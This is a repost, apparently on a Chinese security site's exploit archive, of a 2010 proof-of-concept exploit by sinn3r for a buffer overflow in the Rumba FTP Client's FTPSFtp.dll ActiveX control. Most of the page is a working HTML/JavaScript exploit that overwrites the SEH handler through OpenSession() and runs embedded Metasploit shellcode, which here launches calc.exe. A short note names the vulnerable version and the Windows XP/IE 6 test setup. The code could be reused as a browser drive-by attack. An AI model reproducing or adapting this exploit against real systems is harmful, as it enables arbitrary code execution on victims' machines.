首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow
来源:http://twitter.com/_sinn3r 作者:sinn3r 发布时间:2010-05-24  

<html>
<head>
<title>Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow by sinn3r</title>
</head>
<body>
<object classid="clsid:677A6F83-52A0-4931-8E62-EC713EE9B949" id="ftpsftp"></object>
<script language="JavaScript">
/*
Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow
Vulnerable version download: http://download.cnet.com/Rumba-FTP/3000-2160_4-10587778.html
Found and coded by sinn3r
Greets: Corelan Security Team & Exploit-DB
http://twitter.com/_sinn3r
1) Script provided 'as is', without any warranty. Use for educational purposes only.
2) Do not use this code to do anything illegal, that's ridiculous!
3) You are not allowed to edit/modify this code. If you do, original author cannot be
   held responsible for any damages this may cause.
*/

// http://www.metasploit.com  windows/exec cmd=calc.exe 200 bytes
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPM"+
            "YZEVQN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWK"+
            "RZPPRQGLKQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9"+
            "FFQKOVQO0NL9QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN"+
            "3LKS4LKC1XPMY1TWTGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1L"+
            "KROLGKON5OKZPNUORF6RHOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE35"+
            "12LSS6N3U2X3UUPDJA";

eaxAlign  = unescape(
"%58"+  //POP EAX
"%04%0B" //ADD AL, 0x0B
);

// Original fuzzed size = 13332 bytes. This POC uses 5000 bytes.
var padding1 = unescape("%41");
while (padding1.length < 600)
 padding1 += unescape("%41");
var nseh = unescape("%EB%06%42%42"); //Short JUMP
var seh  = unescape("%71%33%6E%74"); //0x746E3371  msls31.dll  <-- IE 6 addr
var padding2 = unescape("%41");
while (padding2.length < 4389-shellcode.length)
 padding2 += unescape("%41");

ftpsftp.OpenSession(padding1 + nseh + seh + eaxAlign + shellcode + padding2);
</script>
<pre>
|------------------------------------------------------------------|
|   Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Overflow   |
|                                                                  |
| by sinn3r - Corelan & Exploit-DB             twitter.com/_sinn3r |
|------------------------------------------------------------------|

This bug was found when I was verifying another bug for Exploit-DB. Please note that
the latest version of FTPSFtp.dll v4.2.3.0.0 is no longer vulnerable to this, and it
is (duh!) recommended to update your Rumba FTP to the latest version if possible.

[+] Vulnerable Component = FTPSFtp.dll
[+] Version              = 4.2.0.0
[+] Function:            = OpenSession ( ByVal __MIDL_0011 As String ) As Object
[+] progid               = FTPSFTPLib.SFtpApplication
[+] Tested on            = Windows XP SP3 ENG + IE 6
[+] Payload              = windows/exec cmd=calc.exe
[+] Special thanks       = rAWjAW and chap0 for testing
</pre>
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hustoj (fckeditor) remote arbi
·Firefox 3.6.3 (latest) <= memo
·Open and Compact FTP server ve
·Solaris/x86 - Reboot() - 37 by
·CompleteFTP Server version 3.3
·Solarwinds 10.4.0.10 TFTP DOS
·ECShop remote SQL injection ex
·Amaya 11.3.1(dec 9 2009) remot
·WinDirectAudio (.WAV) PoC
·Media Player Classic - v 1.3.1
·Kingsoft WebShield KAVSafe.sys
·Solaris/x86 - Halt shellcode -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved